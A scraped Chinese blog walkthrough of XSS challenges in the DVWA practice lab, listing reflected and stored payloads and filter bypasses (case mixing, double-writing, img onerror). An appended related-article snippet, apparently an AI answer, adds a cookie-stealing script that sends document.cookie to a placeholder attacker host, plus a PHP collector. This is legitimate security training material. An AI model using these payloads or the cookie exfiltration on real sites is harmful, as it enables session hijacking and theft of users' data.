dvwa中的xss(跨站脚本)攻击

DVWAXSS漏洞分析与绕过策略
最新推荐文章于 2024-02-04 09:45:26 发布
原创 最新推荐文章于 2024-02-04 09:45:26 发布 · 3.1k 阅读 · 34 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss

环境:

dvwa: 192.168.11.135 dvwa版本Version 1.9 (Release date: 2015-09-19)

kail机器:192.168.11.156

一、XSS是什么

XSS(Cross Site Scripting,跨站脚本攻击),是指恶意攻击者往web页面里插入恶意script代码,当用户浏览该页面时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的。

xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数

二、跨站脚本攻击XSS分类

  • 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。

  • 存储型XSS:<持久化> 代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内)。

  • DOM型XSS:基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。

三、常用绕过方式

  1. 普通注入:<script>alert('XSS')</script> 或者 <script>alert(document.cookie)</script>

  1. 大小写绕过:<sCript>alert(document.cookie)</scRipt> 或者 <scRipt>alert('lady_killer9')</sCript>

  1. 双写绕过:<scr<script>ipt>alert(document.cookie)</scr<script>ipt> 或者 <scr<script>ipt>aleralertt(document.cookie)</scr<script>ipt>

  1. html标签绕过:<img src=x onerror=alert('XSS');> 或者 <A HREF=http://192.168.11.135:81/phpinfo.php>link</A> 或者 <img src=x:alert(alt) onerror=eval(src) alt=xss>

  1. 闭合标签绕过:></option></select><img src=x:alert(alt) onerror=eval(src) alt=xss>

  1. 闭合+html标签绕过:></option></select><img src=x:alert(alt) onerror=eval(src) alt=xss>

、XSS(Reflected)

4.1、XSS(Reflected) LOW级别

代码:

主要步骤:array_key_exists函数判断name变量是否存在,并判断是否非空。若存在且非空,直接输出。

漏洞原因:

  • 输入未过滤

  • 输出未改变编码

普通注入<script>alert('XSS')</script>

弹出:

4.2、XSS(Reflected) Medium级别

代码:

主要步骤:array_key_exists函数判断name变量是否存在,并判断是否非空。若存在且非空,使用str_replace函数替换<script>为空字符串,然后输出。

漏洞原因:

  • 输入过滤不到位,尝试使用str_replace函数进行过滤,此函数区分大小写,对替换后的字符串不会再检查,可被双写、大小写等绕过

  • 输出未改变编码

普通注入<script>alert(document.cookie)</script>

大小写绕过<sCript>alert(document.cookie)</scRipt>

弹出:

双写绕过<scr<script>ipt>alert(document.cookie)</scr<script>ipt>

弹出:

1.3、XSS(Reflected) High级别

代码:

主要步骤:array_key_exists函数判断name变量是否存在,并判断是否非空。若存在且非空,使用preg_replace函数进行正则表达式匹配,且大小写都会匹配到,替换为空字符串,然后输出。

漏洞原因:

  • 输入过滤不到位,尝试使用preg_replace函数进行正则表达式匹配过滤,但仅匹配了<script>相关,未匹配html标签

  • 输出未改变编码

普通注入<script>alert('XSS')</script>

注入失败,仅剩余了>,其他全部没有了,再尝试大小写或双写绕过。

大小写绕过<sCript>aleRt(document.cookie)</scRipt>

注入失败。

双写绕过<scr<script>ipt>aleralertt(document.cookie)</scr<script>ipt>

注入失败。可能使用了正则表达式,尝试不使用js标签

html标签绕过<img src=x onerror=alert('XSS');>

<A HREF=http://192.168.11.135:81/phpinfo.php>link</A>

五、XSS(Stored)

5.1、XSS(Stored) LOW级别

正常输出:

代码:

主要步骤

  • isset函数判断btnSign是否提交,即是否点击了Sign Guessbook按钮;

  • 使用trim函数去除提交的mtxMesssage、txtName前后导空格,分别给message、name变量;

  • 使用stripslashes函数对message删除反斜杠,使用mysqli_real_escape_string函数对name、message变量中的特殊字符转义;

  • 使用mysqli_query函数插入数据库。

漏洞原因:

  • 未过滤输入,使用post方式增加难度

  • 输出未改变编码

  • 使用前端限制长度

通过阅读后端代码,我们发现name、message长度的判断并不在后端,按F12查看前端代码:

普通注入:分别在Name与Message输入框输入 <script>alert('lady_killer9')</script>

点击Sign Guestbook后:

注入失败。

方法1Name有长度限制,Message注入失败,应该是Name可以注入,但是被限制了。尝试抓包进行注入:

注入成功,弹出:

方法2:前端页面中删除maxlength="10"

改成

5.2、XSS(Stored) Medium级别

正常输出:

前端限制Name、Message的长度。

代码:

主要步骤

  • isset函数判断btnSign是否提交,即是否点击了Sign Guessbook按钮;

  • 使用trim函数去除提交的mtxMesssage、txtName前后导空格,分别给message、name变量;

  • 使用strip_tags函数对 使用函数addslashes添加反斜杠的message变量 剥去heml、xml、php标签,使用mysqli_real_escape_string函数对message变量中的特殊字符转义

  • 使用str_replace函数将name中的<script>标签替换为空字符串,使用mysqli_real_escape_string函数对name变量中的特殊字符转义

  • 使用mysqli_query函数插入数据库

漏洞原因:

  • 输入过滤不到位,尝试使用str_replace函数进行过滤,此函数区分大小写,对替换后的字符串不会再检查,可被双写、大小写等绕过

  • 输出未改变编码

  • 使用前端限制长度

普通注入:前端删除输入长度限制,分别在Name与Message输入框输入 <script>alert('lady_killer9')</script>

标签被删除

标签没了,尝试大小写绕过。

大小写绕过<scRipt>alert('lady_killer9')</sCript>

注入成功。

5.3、XSS(Stored) High级别

post方式,前端检查长度,直接删除,然后Html标签绕过。

代码:

主要步骤

  • isset函数判断btnSign是否提交,即是否点击了Sign Guessbook按钮;

  • 使用trim函数去除提交的mtxMesssage、txtName前后导空格,分别给message、name变量;

  • 使用strip_tags函数对 使用函数addslashes添加反斜杠的message变量 剥去heml、xml、php标签,使用mysqli_real_escape_string函数对message变量中的特殊字符转义

  • 使用preg_replace函数进行正则表达式匹配,然后替换为空字符串,使用mysqli_real_escape_string函数对name变量中的特殊字符转义

  • 使用mysqli_query函数插入数据库

漏洞原因:

  • 输入过滤不到位,尝试使用preg_replace函数进行正则表达式匹配过滤,但仅匹配了<script>相关,未匹配html标签

  • 输出未改变编码

  • 使用前端限制长度

html标签绕过<img src=x onerror=alert('XSS');>

注入成功。

六、参考

跨站脚本漏洞(XSS)基础讲解 - 简书 (jianshu.com)

网络安全-靶机dvwa之XSS注入Low到High详解(含代码分析)_lady_killer9的博客-优快云博客_dvwa xss注入

dvwa中的XSS攻击(反射)
qq_45653152的博客
06-13 1991
三种xss: 反射:需攻击者提前构造一个恶意链接,诱使用户点击(经后端,不经数据库) 存储:攻击者在论坛的楼层包含一段恶意代码,并且服务器未进行正确的过滤输出,造成浏览该页面的用户执行这段代码(经过后端与数据库) DOM:利用非法输入来闭合对应的HTML标签(不经过后端,是基于文档对象模型的一种漏洞,是通过url传入参数去控制触发的) Xss(refiected反射型) Low等级: 代码显示X-XSS-Protection:0(0: 表示关闭浏览器的XSS防护机制)即未实施任何防御措施,且对name没有任
DVWA | XSS 跨站脚本注入
最新发布
qq_44846097的博客
09-26 896
XSS漏洞是针对网站应用程序的前端的安全漏洞攻击技术,属于代码注入的一种。XSS注入根据注入方式主要区分三种类型:反射型、存储型和DOM型。
DVWA学习之XSS跨站脚本攻击
mmxhappy的专栏
02-04 1282
跨站脚本攻击XSS(Cross Site Script) 为了不和层叠式演示表(Cascading Style Sheets,CSS) 的缩写混淆,顾将跨站脚本攻击缩写为XSS。恶意攻击者网web页面插入恶意Script代码,当用户浏览该页面时,嵌入web里面的script代码就会被执行,从而达到攻击用户的目的。XSS攻击针对的是用户层面的攻击
DVWA靶场系列(六)—— XSS跨站脚本攻击
qq_45612828的博客
08-02 3085
DVWA靶场系列(六)—— XSS跨站脚本攻击
DVWA-XSS
qq_58091216的博客
04-19 5879
一.DOM型xss 1.low (1)我们知道最基础的xss攻击就是<script>alert(/xss/)</script> (2)我们看到english直接按select,可以看到?default=English,我们知道在?default后面进行xss攻击 (3)我们直接输入<script>alert(/xss/)</script>,可以看到弹窗 (4)因为low比较简单所以我把分析源代码放在了最后。可以看到没有如何防御 2.m.
XSS跨站脚本攻击DVWA XSS攻击详解、XSS平台搭建)
tmzy1的博客
03-20 2791
XSS攻击XSS平台搭建
DVWA------XSS(全)
m0_65712192的博客
12-13 7800
DVWA-----XSS(全)
DVWAXSS 跨站脚本攻击
过期的秋刀鱼
08-16 1178
查看页面代码,发现我们构造的语句已经被插入到了value当中,不能成功执行的原因是select标签中只允许内嵌option标签,而option标签是不能嵌套我们构造的img标签的,因此我们需要先将前面的select标签和option标签都闭合后才能使用img标签.只能找方法绕过服务器端的处理,直接在本地运行我们构造的语句,可以过“#”来注释掉后面的内容,因为URL栏中的“#”之后的内容不会被发送到服务器当中去,不会经过JS的过滤,只在客户端显示,可以直接与浏览器进行交互。发现没有什么防御,直接。
DVWA测试XSS跨站脚本攻击三种类型
WINDY_PACE的博客
05-04 1994
测试XSS三种类型危害最大的存储型如何无声息钓鱼获取到用户信息
DVWAXSS跨站脚本攻击(DOM型)
ximo的博客
01-27 760
DVWAXSS跨站脚本攻击(DOM型) DOM ——文本对象类型,通过修改js标签触发xss(个人理解) 目录DVWAXSS跨站脚本攻击(DOM型)低等级1.弹窗2.重定向3.获取cookie中等级高等级 低等级 1.弹窗 插入恶意代码: 直接嵌入: 成功触发: 查看前端代码,发现js代码被插入到 value 值中: 另一种方式 js代码: </option></select><img src='' onerror=alert('xss')> 使用 < /o
DVWAXSS跨站脚本攻击(反射型)
ximo的博客
01-26 551
DVWAXSS跨站脚本攻击(反射型) 这里写目录标题DVWAXSS跨站脚本攻击(反射型)环境及原理低等级一、弹窗插入恶意代码返回被插入恶意代码的页面发送url给被攻击者,被攻击者打开页面,并触发XSS二、重定向三、获取cookie中等级高等级 环境及原理 环境: kali linux 、dvwa攻击机(win10)、 被攻击机(win7) 原理 1.弹窗 2.重定向 3.获取cookie 低等级 一、弹窗 js恶意代码: # 直接嵌入 <script>alert('xss')&lt
DVWAXSS跨站脚本攻击
sunshine1_0的博客
04-17 773
XSS跨站脚本攻击
DVWA跨站脚本攻击xss
qq_54537919的博客
06-27 1113
DVWA跨站脚本攻击xss) 原理、分类:反射型、存储型、DOM型的low、medium、high
DVWA学习之XSS跨站脚本攻击)(超级详细)
热门推荐
weixin_40950781的博客
08-22 1万+
DVWA学习之XSSXSS 跨站脚本攻击0x01 XSS(Cross Site Script)简介0x02 何为XSS0x03 XSS存在的原因0x04 XSS漏洞的危害0x05 XSS 的分类及特点1. 存储型XSS2. 反射型XSS3. MOD型XSS XSS 跨站脚本攻击 0x01 XSS(Cross Site Script)简介 0x02 何为XSS 跨站脚本攻击XSS(Cross Sit...
dvwa———xss(全)
GZY0601的博客
09-28 2864
这个章节我们来讲一下xss攻击XSS 又称CSS(Cross Site Scripting)跨站脚本攻击攻击者在网页中插入由JavaScript编写的恶意代码,当用户浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。xss有三种:反射型(Reflected),存储型(Stored)和DOM型反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库)存储型XSS:将用户输入的数据存储在服务器端。
DVWA-XSS跨站脚本攻击
weixin_50341025的博客
04-15 1624
DVWA-XSS XSS概念:由于web应用程序对用户的输入过滤不严,通过html注入篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击XSS类型: 反射型XSS:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要去诱使用户点击一个恶意链接,才能攻击成功。 存储型XSS:将用户输入的数据存储在服务器端,每次用户访问都会被执行js脚本。 DOM型XSS:文本对象模式xss,通过修改页面的DOM节点形成的XSS,可存储型、可反射型,只取决于输出地点。 XSS的应用场景: 1.
DVWAXSS (完整版)
一期一会的博客
03-30 6197
xss DOM型xss
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 4100
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA靶场-XSS跨站脚本攻击
zeroone的博客
03-12 2050
第十关:XSS跨站脚本攻击)       XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。 反射型XSS Low <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET
XSS跨站脚本攻击,用卡利完成。
07-01
<think>我们正在讨论的是KaliLinux上进行XSS跨站脚本攻击的教程。根据引用内容,XSS攻击分为反射型、存储型和DOM型,而实践环境通常使用DVWA(Damn Vulnerable WebApplication)靶机。下面将分步骤说明如何在Kali Linux上搭建DVWA并进行XSS攻击实验。 ###步骤1:安装Kali Linux并更新系统确保你已安装KaliLinux。打开终端,执行以下命令更新系统:```bashsudoapt update&& sudoapt upgrade-y```###步骤2:安装必要的软件DVWA需要Web服务器(如Apache)、数据库(如MySQL)和PHP支持。在KaliLinux上安装LAMP环境: ```bashsudo aptinstall apache2mysql-serverphp libapache2-mod-phpphp-mysql -y``` ###步骤3:启动Apache和MySQL服务```bashsudo systemctl startapache2sudo systemctl startmysql``` ###步骤4:配置MySQL数据库运行安全脚本并设置root密码(按提示操作):```bashsudomysql_secure_installation``` 登录MySQL,创建DVWA数据库和用户:```bashsudomysql -u root-p```在MySQL提示符下执行:```sqlCREATEDATABASEdvwa; CREATEUSER 'dvwa'@'localhost'IDENTIFIED BY'password'; GRANT ALLPRIVILEGES ONdvwa.* TO'dvwa'@'localhost';FLUSHPRIVILEGES;exit;``` ###步骤5:下载并配置DVWA下载DVWA:```bashcd/var/www/htmlsudogit clonehttps://github.com/digininja/DVWA.git```设置权限: ```bashsudo chown -R www-data:www-dataDVWAsudochmod-R755DVWA```###步骤6:配置DVWA数据库连接复制配置文件模板: ```bashcd DVWA/configsudocp config.inc.php.dist config.inc.php``` 编辑`config.inc.php`,修改数据库连接信息:```php$_DVWA['db_user'] ='dvwa';$_DVWA['db_password'] ='password'; ```###步骤7:访问DVWA并初始化在浏览器中打开:`http://localhost/DVWA/setup.php`,点击“Create/ResetDatabase”按钮初始化数据库。默认登录凭证:`admin`/`password`。 ###步骤8:进行XSS攻击实验以反射型XSS为例: 1.在DVWA左侧选择“XSS Reflected”。2.在输入框中尝试注入脚本,例如:`<script>alert(document.cookie)</script>`。 3.提交后,如果页面弹出包含cookie的警告框,说明攻击成功。 存储型XSS(在留言板等处注入)和DOM型XSS(通过修改URL参数触发)实验方法类似,但需注意DVWA的安全级别设置(可在DVWA中调整)。###注意事项-实验仅在本地环境进行,切勿对未授权网站进行测试。 -理解每种XSS类型的原理和防御措施。§§相关问题§§1.如何防御XSS攻击? 2. DVWA中如何调整安全级别?3.除了DVWA,还有哪些常用的Web安全实验靶场?</think>### Kali Linux上进行XSS跨站脚本攻击的实践教程 XSS攻击通过在目标网站注入恶意脚本窃取用户信息或执行恶意操作[^1]。以下是在Kali Linux环境下进行XSS攻击实验的完整步骤: --- #### **一、环境准备** 1. **安装Kali Linux** 确保已安装最新版Kali Linux(推荐2023.x+版本) 2. **安装必要工具** ```bash sudo apt update sudo apt install apache2 php mysql-server git -y ``` 3. **启动服务** ```bash sudo systemctl start apache2 mysql ``` --- #### **二、搭建DVWA靶机** DVWA(Damn Vulnerable Web App)是专为安全测试设计的漏洞环境[^2]: ```bash cd /var/www/html sudo git clone https://github.com/digininja/DVWA.git sudo chown -R www-data:www-data DVWA ``` 1. 访问 `http://localhost/DVWA/setup.php` 2. 点击 **Create/Reset Database** 初始化数据库 3. 登录账号:`admin`/`password` > 在DVWA安全设置中调整难度为 **LOW**:`DVWA Security -> Low` --- #### **三、XSS攻击实践** ##### **1. 反射型XSS**(非持久化攻击) ```bash # 访问XSS测试页面 http://localhost/DVWA/vulnerabilities/xss_r/?name=<script>alert(1)</script> ``` 当参数`name`被注入恶意脚本时,浏览器会执行弹窗[^3]。 ##### **2. 存储型XSS**(持久化攻击) 1. 进入DVWA的 **XSS Stored** 模块 2. 在留言板输入: ```html <script>alert(document.cookie);</script> ``` 3. 提交后,所有访问该页面的用户都会触发脚本泄露cookie ##### **3. DOM型XSS** ```bash # 构造恶意URL http://localhost/DVWA/vulnerabilities/xss_d/?default=<script>alert("DOM XSS")</script> ``` --- #### **四、实战技巧** 1. **窃取Cookie** 使用真实攻击脚本: ```html <script>new Image().src="http://攻击者IP/cookie.php?c="+document.cookie;</script> ``` 在攻击机创建`cookie.php`: ```php <?php file_put_contents("stolen_cookies.txt", $_GET['c']); ?> ``` 2. **防御绕过** 当过滤`<script>`标签时尝试: ```html <img src=x onerror=alert(1)> ``` --- #### **五、防御建议** 1. 输入输出过滤(如HTML实体编码) 2. 使用CSP(Content Security Policy) 3. 设置HttpOnly Cookie标志 > ⚠️ **法律声明**:本教程仅用于授权环境的安全学习,未经授权的攻击行为违法。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值